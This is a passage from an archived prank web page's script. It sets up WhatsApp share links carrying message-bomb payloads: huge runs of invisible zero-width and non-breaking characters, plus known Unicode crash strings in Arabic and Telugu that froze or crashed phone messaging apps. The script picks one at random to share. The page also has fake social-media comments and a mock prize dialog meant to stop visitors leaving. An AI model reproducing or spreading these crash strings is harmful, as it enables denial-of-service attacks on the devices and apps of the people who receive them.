%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D %C2%A0 %C2%A0 %C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 BLAKE%C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D", "whatsapp://send?text=    %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D   BLAKE    %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D   BLAKE    %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D   BLAKE    %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D       %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D      %E2%80%8D", "whatsapp://send?text=" + garbage5, "whatsapp://send?text=" + garbage6, "whatsapp://send?text=" + garbage7, "whatsapp://send?text=" + garbage8, "whatsapp://send?text=" + garbage9, "whatsapp://send?text=" + garbage10, "whatsapp://send?text=%65%66%66%65%63%74%69%76%65%2E%20%50%6F%77%65%72%20%D9%84%D9%8F%D9%84%D9%8F%D8%B5%D9%91%D8%A8%D9%8F%D9%84%D9%8F%D9%84%D8%B5%D9%91%D8%A8%D9%8F%D8%B1%D8%B1%D9%8B%20%E0%A5%A3%20%E0%A5%A3%68%20%E0%A5%A3%20%E0%A5%A3%20%E5%86%97%2C", "whatsapp://send?text=%E0%B0%9C%E0%B1%8D%E0%B0%9E%E0%B0%BE", "whatsapp://send?text=%E0%B0%9E"],
        showMessage = myarray[Math.floor(Math.random() * myarray.length)];
    c = 0;
    var image;
    $.fn.txtFader = function(e, n) {
        this.fadeOut(n, function() {
            $(this).html(e).fadeIn(n)
        })
    }, $(document).ready(function() {
        FBcom("#fb1", 3e3), FBcom("#fb2", 5e3), FBcom("#fb3", 7e3), FBcom("#fb4", 9e3), FBcom("#fb5", 10500), FBcom("#fb6", 13e3), FBcom("#fb7", 15e3), FBcom("#fb8", 2e4), $(".like").click(function() {
            $(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like"), $("#youand").html("")) : ($(this).addClass("selected"), $(this).html("Unlike"), $("#youand").html("You and "))
        }), $(".fblike").click(function() {
            $(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like")) : ($(this).addClass("selected"), $(this).html("Unlike"))
        });
        for (var e = 1; e <= $(".q").length; e++) console.log(e), clicker(e)
    }), window.onbeforeunload = function() {
        return window.btn_clicked ? void 0 : "You have got (1) more spin!\n\nPlay the game and you may win exclusive prizes from our sponsors.\n\nToday's prizes include Supreme™ Brick™, Thonking plushie, ＦＯＲＴＲＡＮ, Nothing™, Crying-laughing-pain Emoji sticker, Useless shit, Free Jail Time of 999 Years™ and many more!"
    };
</script>

<style type="text/css">div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}</style>




<style type="text/css">div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}</style></body></html>
<!--
     FILE ARCHIVED ON 15:24:41 Apr 05, 2018 AND RETRIEVED FROM THE
     INTERNET ARCHIVE ON 03:57:16 Oct 20, 2018.
     JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE.

     ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C.
     SECTION 108(a)(3)).
-->
